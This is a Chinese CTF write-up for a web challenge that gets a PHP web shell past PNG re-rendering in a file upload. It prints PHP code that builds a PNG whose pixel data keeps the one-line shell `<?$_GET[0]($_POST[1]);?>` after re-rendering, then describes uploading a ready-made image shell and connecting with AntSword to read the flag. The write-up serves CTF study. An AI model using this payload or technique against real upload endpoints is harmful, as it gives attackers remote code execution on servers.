SHCTF-week3-复现

WEB

[Week3] 拜师之旅·番外

上传一个png图片之后会提示你下载或访问,我们把下载下来的图片和上传的图片放在010里对比一下

2个文件比较.jpg

然后可以看到图片的内容被改了,所以这题考点是png图片二次渲染

贴一下官方wp里的php代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);

$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'1.png'); //要修改的图片的路径

/* 木马内容
<?$_GET[0]($_POST[1]);?>
*/
?>

生成一个不被渲染的png图片,上传后访问图片的地址,根据木马内容可以知道需要get和post传参

这个脚本生成出来的图片不知道为什么用了做不出来,于是找到了其他的

https://www.freebuf.com/articles/web/312206.html

文章末尾有图片下载的链接,里面有写好的图片马,上传就行,然后用蚁剑连接是成功的

连接成功.jpg

flag在根目录,直接看就好

小结:二次渲染类的题目找到没有被渲染的地方加入一句话木马,蚁剑连接就行

可以参考:https://blog.csdn.net/weixin_45588247/article/details/119177948